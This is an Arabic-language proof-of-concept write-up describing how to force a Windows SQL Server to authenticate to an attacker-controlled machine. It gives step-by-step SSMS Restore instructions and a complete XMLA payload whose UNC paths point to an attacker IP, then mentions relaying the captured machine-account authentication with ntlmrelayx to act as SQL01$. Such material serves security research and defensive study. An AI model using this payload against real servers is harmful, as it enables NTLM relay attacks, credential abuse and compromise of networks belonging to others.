
تقنية لإجبار خادم SQL Server على نظام ويندوز على المصادقة على جهاز آخر.

تقنية لإجبار خادم SQL Server على نظام ويندوز على المصادقة على جهاز عشوائي.
هذا الإثبات المفاهيمي من تأليف مشترك لكل من:
من أجل تحفيز المصادقة من حساب الجهاز المحلي، نحتاج إلى الاتصال بخادم SQL Server البعيد باستخدام بيانات اعتماد مستخدم:

ثم نختار "Restore" لاستعادة قاعدة البيانات من ملف معيّن.

لتوليد ملف XMLA، ضع المسار إلى ملف عشوائي في حقل "Backup File" ثم انقر فوق Ok.

ثم غيّر المسار إلى ملف عشوائي واستبدله بمسار UNC إلى خادم المهاجم (على سبيل المثال \\192.168.128\SYSVOL\db.abf)

استعلام XMLA الخاص بإثبات الفكرة (poc.xmla):
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
<File>\\192.168.2.51\SYSVOL\db.abf</File>
<DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
<DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>
ونحصل على مصادقة من حساب الجهاز المحلي لخادم SQL Server:

بمجرد حصولنا على المصادقة، يمكننا ترحيلها باستخدام ntlmrelayx لتنفيذ العديد من الإجراءات نيابةً عن جهاز الكمبيوتر SQL01$.
هذا أمر رائع، لكن من المعقد تحفيز هذه المصادقة القسرية من جهاز اختراق يعمل بنظام لينكس لأننا لا نملك وصولاً إلى SQL Server Management Studio (SSMS).